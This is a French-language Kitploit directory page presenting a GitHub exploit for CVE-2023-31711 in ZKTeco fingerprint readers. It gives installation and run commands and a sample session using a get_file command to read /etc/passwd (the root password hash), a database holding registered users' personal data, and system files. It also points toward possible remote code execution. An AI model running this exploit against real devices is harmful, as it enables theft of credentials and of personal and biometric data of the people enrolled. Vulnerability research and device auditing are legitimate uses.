Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2023-31711 — Vulnérabilité zero-day dans le lecteur biométrique d'empreintes digitales ZKTEco. | Kitploit
Outils/GitHubGitHub/hritikthapa7/cve-2023-31711
Analyse des VulnérabilitésExploitationExploitation d'Applications WebExfiltration de DonnéesCollecte d'InformationsTests d'Intrusion
GitHubhritikthapa7/cve-2023-31711

CVE-2023-31711

Vulnérabilité zero-day dans le lecteur biométrique d'empreintes digitales ZKTEco.

Voir le dépôt
22il y a 3 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2023-31711

Contrôle d'accès incorrect dans ZKTECO permettant aux attaquants distants de lire n'importe quel fichier via l'API administrative.

Installation des modules requis

  • Dans le répertoire ZKTEco :
    $ pip install -r ./pyzatt/requirements_dev.txt

Exécution de l'exploit

  • Dans le répertoire ZKTEco :
    $ python exploit.py <ip_address>
    Connected to 10.0.2.25
    (Cmd) get_file <file_name>
    Examples:
    get_file /etc/passwd: Disclosed root password's hash
    get_file /mnt/mtdblock/data/ZKDB.db: Disclosed PII of registered users. To read the contents, you might need to run this command sequentially as many times till the whole contents
    get disclosed
    get_file /mnt/mtdblock/data/ZKSystem.db: Disclosed sensitive information related to the system

Crédits

Exploit : https://github.com/ProCheckUp/SafeScan

Module Pyzatt : https://github.com/adrobinoga/pyzatt

Remarque

Les appareils pourraient également être potentiellement vulnérables à une exécution de code à distance via l'utilisation de l'API administrative. L'exploit mentionné dans la section crédits pourrait être un bon point de départ pour y trouver un test.

Télécharger l’outil